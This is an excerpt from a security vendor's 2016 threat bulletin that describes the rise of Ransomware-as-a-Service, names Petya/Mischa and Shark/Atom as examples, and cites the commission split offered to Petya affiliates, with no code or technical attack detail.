“As the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise. We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.”

GReAT, Threat Predictions for 2017

The thriving ransomware economy

Kaspersky Security Bulletin 2016. Story of the year

The rise of RaaS

While Ransomware-as-a-Service is not a new trend, in 2016 this propagation model continued to develop, with ever more ransomware creators offering their malicious product ‘on demand’. This approach has proved immensely appealing to criminals who lack the skills, resources or inclination to develop their own.

Ransomware is increasingly for hire on the criminal underground #KLReport

Notable examples of ransomware that appeared in 2016 and use this model are Petya/Mischa and Shark ransomware, which was later rebranded under the name Atom.

This business model is increasingly sophisticated:

Kaspersky Security Bulletin 2016. Story of the year

The Petya ransomware partner site

The partner often signs up to a traditional commission-based arrangement. For example, the “payment table” for Petya ransomware shows that if a partner makes 125 Bitcoins a week thy will walk away with 106.25 Bitcoins after commission.

Kaspersky Security Bulletin 2016. Story of the year